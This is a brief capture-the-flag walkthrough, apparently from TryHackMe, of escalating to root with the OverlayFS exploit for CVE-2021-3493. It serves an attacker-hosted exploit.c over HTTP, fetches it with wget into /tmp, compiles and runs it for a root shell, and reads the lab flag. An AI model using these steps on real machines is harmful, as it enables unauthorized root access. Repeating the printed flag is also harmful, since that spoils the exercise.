Overlayfs

• SSHing to the machine

  ssh [email protected] 
  

• The exploit of the CVE-2021-3493 is available on this website

• on our host machine from the directory where exploit.c is contained

python3 -m http.server

• on the SSHed machine CDing to the /tmp which is writable

 wget http://ip:8000/exploit.c

chmod +rwx exploit.c

gcc -o exploit exploit.c

• ./exploit.c gives the rootshell
• cat /root/flag.txt ---> thm{27aaa5865a52dcd4cb04c0e0a2d39404}